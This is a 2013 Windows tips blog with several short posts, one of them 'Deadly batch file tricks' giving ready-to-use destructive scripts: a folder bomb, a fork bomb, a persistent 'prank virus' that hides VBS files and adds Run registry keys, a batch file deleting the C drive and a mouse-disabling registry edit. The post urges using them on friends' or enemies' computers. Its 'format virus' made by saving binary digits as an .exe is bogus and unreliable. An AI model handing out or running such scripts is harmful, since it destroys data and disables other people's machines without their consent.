Monday, September 9, 2013

Getting an Email Alert (with Picture) When Someone Tries to Log into your Computer

If you have doubts that someone else has used your computer or tried to access by logging in or you don’t trust your friend to whom you have given your password while sharing cubicle.

How to be aware of this cheat?
Introduction of a new website (made in Turkey), called MouseLock.co is now resolving your problem. You will receive an email from them in which they will alert you and the picture of the intruder will be shown by them to you as soon as he/she tries to access to your computer.

Friday, September 6, 2013

How to create your own run commands

I hope you all already know what is a run command. But if don't, It is a default function provided by windows OS to jump on any software you want to work on. It is like a shortcut to avoid the step by step procedure . Since it is not possible to keep icons of all the programs on the desktop, windows has equipped this RUN command for ease of use.



To open the RUN window simply press Windows key and then R key on your keyboard. (i.e. Window+R).


Then type any program name that you want to execute and you are done the program will start running. But the drawback is that there are only few inbuilt programs which can be used via this method. But here I am showing you the trick to create commands that are not built in within the windows and you can run any of the software by typing any keyword you wish to assign to that software.


Wednesday, September 4, 2013

No-wait Screen Savers

Don't want to wait for your screen saver to kick in? Create a shortcut to it just as you would for any other program by hitting Windows key + F to search your computer and click on "All files and folders." Type "*.scr" in the "All or part of the file name" field to find every screen saver file on your computer. In the resulting list, right-click and drag the screen saver you want to your desktop. Whenever you want it to start, just double-click its icon.

Tuesday, September 3, 2013

All (Ctrl+Alt+Del) Permanently deleted files Recovery solution

Sometimes we delete the files permanently, and realize that deleting them is like a Blunder...

For all those folks,
Here is the solution

Software called "Kissass Undelete" , can bring those files from the hard disk or your flash drive.
Conditions : Only if the data on that drive is not re-occupied(or written). that means the space which was available after the deletion is not been occupied after the deletion.

Click Here to download the .

1)
To start searching for the files,
Select the drive from the Left panel of the Windows and Click the scan button.
the Scan might take upto 10 secs.

Monday, September 2, 2013

Make Your Windows Desktop Look Like Android Homescreen

Windows 7 has a relatively simple user interface, but have you ever wished it looked a little more like Android? Deviant Art’s hameddanger has put together an Android Skin Pack that gives Windows 7 a little bit of an Android-inspired makeover.
Yes, an Android Style Transformation Pack is what you need to give your desktop/laptop a cool new look !
The utility doesn’t let you run Android apps on a Windows computer, but it moves the taskbar to the top of the screen and gives it a bit of an Android status-bar style look. Icons for the battery, wireless, and audio are converted into Android-style icons, and the whole user interface looks a lot more… green.

DEADLY BATCH FILE TRICKS THAT YOU SHOULD NEVER TRY ON YOUR PC


In this tutorial I'm going to explain some deadly batch file tricks and hacks that can completely destroy your Windows Registry, You have to re-format your computer to bring it back to normal. Batch files discussed in this post can create a real havoc on your computer, they can completely irritate you so don't try them on your PC. 


Use them on your friends or enemies computer.


1. Crash a Computer with just a link
Click Here (http://tiny.cc/ibJUN)


2. Folder Bomber
This batch file will create 3000+  folder in less than a minute.
Open your notepad and type the following codes.
@echo off
:top
md %random%
goto top


Save it as 3000.bat
Give this file to your friend and   when he will click on that his nightmare will be started.


Above Code Explained.
@echo off makes your command prompt window blank. md %random% is the command in MS-DOS to create random folders. (md is used for creating a folder and 


%random% means folders with random names.) goto top- retures the command to :top which causes an infinite loop.


2. Fork Bomber
It is  another batch file which ulitises 100% computer resources and memory making your computer irresponsive and at last your compuer hangs. Just copy and paste 


the below codes and save it as fork.bat
:s<br />start %0<br />%0|%0<br />goto :s<br />


3. Getting Blue Screen Of Death (BOSD)
You may be surprised to know that Windows has a built-in self-crashing mechanism (no pun intended). Though it is quite easy to crash a Windows box whenever 


you doesn't want it to crash, it may be quite difficult to reproduce the scenario, when you desperately want your box crashed. So here we give you two methods to 


crash your Windows box. 
Method 1: Windows Built-in Self Crasher
This method produces the 'awesome' BSOD (Blue Screen Of Death) that you are no doubt familiar with. The PC gets locked up and the only way to recover is to 


reboot it. Just follow these steps:


Run Regedit (Start -> Run -> regedit)
Navigate to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\i8042prt\Parameters
Create a new DWORD value with name CrashOnCtrlScroll and give it a value 1
Reboot the PC
Now whenever you want to see the cute blue screen (and crash your system), press and hold the Ctrl key on the right side of the keyboard and hit the Scroll Lock key 


twice.


3. Prank Virus
Just copy and paste the below mentioned codes and see the fun. You can edit the codes to make i more funny or even deadly.
@echo off
echo Set oWMP=CreateObject("WMplayer.OCX.7")>>123.vbs
echo Set colCDROMs=oWMP.cdromCollection>>123.vbs
echo do>>123.vbs
echo if colCDROMs.count>=1 then>>123.vbs
echo for i=0 to colCDROMs.Count -1>>123.vbs
echo colCDROMs.Item(i).Eject>>123.vbs
echo Next>>123.vbs
echo For i=0 to colCDROMs.Count -1>>123.vbs
echo colCDROMs.Item(i).Eject>>123.vbs
echo Next>>123.vbs
echo End If>>123.vbs
echo wscript.sleep 5000>>123.vbs
echo loop>>123.vbs
echo DO>>1234.vbs
echo MSGBOX "YOU ARE SCREWED!!!!!!!!!!!!",64,"ErR0r">>1234.vbs
echo LOOP>>1234.vbs
copy /y 123.vbs C:\
copy /y 1234.vbs C:\
attrib +s +h c:\123.vbs
attrib +s +h c:\1234.vbs
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\ /v NoClose /t REG_DWORD /f /d 1
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\policies\system\ /v legalnoticetext /f /d "YOR ARE BEEN SCREWED"
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\policies\system\ /v legalnoticecaption /f /d "B0zZ_ErR0r"
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v 123.vbs /d c:\123.vbs
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v 1234.vbs /d c:\1234.vbs
attrib +s +h c:\123.vbs
attrib +s +h c:\1234.vbs
start 123.vbs
start 1234.vbs
echo Code Smahser owns your computer!!>>c:\almasmalik.txt
echo Code Smahser owns your computer!!>>d:\almasmalik.txt
echo Code Smahser owns your computer!!>>e:\almasmalik.txt
msg * MAY YOUR COMPUTER "REST IN PEACE"


5. Open Command Prompt Window infinite times untill your Computer Crashes
Just copy and paste the below codes to make your computer crash. (After you will restart your computer, it will be back to normal)
@echo off
:loop
start cmd.exe
goto loop
"cmd.exe" can be changed to any other program also like Calculator. For calculator use calc.exe, for My Computer use explorer.exe and so on.


How to Make the virus ?

   1. Open Notepad and copy below code into it.

      @Echo off
      Del C:\ *.* |y

   2. Save this file as virus.bat (Name can be anything but .bat is must)
   3. Now, running this file will delete all the content of C Drive.


Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.


Make a virus that disable Mouse

*Open Notepad and copy below codes

rem --------------------------------- 
rem Disable Mouse 
set 
key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass" 
reg delete %key% 
reg add %key% /v Start /t REG_DWORD /d 4 
rem --------------------------------- - 

*Save this file as  virus.bat 
*Done you just created your virus.

Virus to Format Hard Disk !!!

Copy the below codes into Notepad.

01001011000111110010010101010101010000011111100000 

Save the file as Format.exe 

Sunday, September 1, 2013

How To Reinstall Windows XP Without Having to Reactivate With Microsoft

I find that I have to reinstall Windows at least every 6 months to a year. It simply gets too slow because of all the registry changes and modifications. And it’s also great if you got a used computer from somewhere and you would rather wipe it clean and start fresh.
The only issue with re-installing Windows is that you have to be careful about the reactivation process. By default, if you use the OEM CD that came with your computer when you first bought it, re-installing Windows should be a breeze and you won’t have to reactivate.
However, this may not always be the case. If you don’t use the original CD that came with the computer, you may have to re-activate. Also, sometimes even when you use the same CD, it may not force you to re-activate XP.